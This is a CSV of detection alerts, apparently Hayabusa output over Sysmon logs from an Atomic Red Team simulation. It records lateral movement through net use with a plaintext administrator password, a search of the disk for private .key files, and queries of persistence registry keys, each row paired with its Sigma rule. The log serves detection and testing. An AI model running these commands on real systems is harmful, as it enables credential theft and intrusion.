2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D849-5D31-0000-00103C522F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,LatMov,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D84E-5D31-0000-00102C702F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6524 | PGUID: 747F3D96-D859-5D31-0000-0010E68C2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-D859-5D31-0000-0010FB8F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D859-5D31-0000-001045922F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .key | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D859-5D31-0000-00109E932F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3188 | PGUID: 747F3D96-D87B-5D31-0000-0010D92D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2888 | PGUID: 747F3D96-D87C-5D31-0000-0010E83B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D87C-5D31-0000-0010413E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D87C-5D31-0000-00107A403100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 5256 | PGUID: 747F3D96-D87C-5D31-0000-0010CC423100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D87C-5D31-0000-001009453100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 6208 | PGUID: 747F3D96-D87C-5D31-0000-00105B473100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D87C-5D31-0000-001097493100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D87C-5D31-0000-0010E94B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1428 | PGUID: 747F3D96-D87C-5D31-0000-0010264E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D87C-5D31-0000-001078503100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D87C-5D31-0000-0010B4523100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D87C-5D31-0000-001006553100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D87C-5D31-0000-00103F573100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | LID: 0x50951 | PID: 4360 | PGUID: 747F3D96-D87C-5D31-0000-001080593100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 956 | PGUID: 747F3D96-D87C-5D31-0000-0010CA5B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D87C-5D31-0000-00101D5E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6832 | PGUID: 747F3D96-D87C-5D31-0000-001056603100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 6436 | PGUID: 747F3D96-D87C-5D31-0000-0010A8623100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5936 | PGUID: 747F3D96-D87C-5D31-0000-0010E1643100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D87C-5D31-0000-001033673100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1740 | PGUID: 747F3D96-D87C-5D31-0000-00107C693100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 644 | PGUID: 747F3D96-D87C-5D31-0000-0010C86B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4220 | PGUID: 747F3D96-D87C-5D31-0000-0010056E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | LID: 0x50951 | PID: 6620 | PGUID: 747F3D96-D87C-5D31-0000-001057703100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D87D-5D31-0000-001090723100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 3172 | PGUID: 747F3D96-D87D-5D31-0000-0010E2743100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2148 | PGUID: 747F3D96-D87D-5D31-0000-00102B773100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 1472 | PGUID: 747F3D96-D87D-5D31-0000-00107D793100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3616 | PGUID: 747F3D96-D87D-5D31-0000-0010B37B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
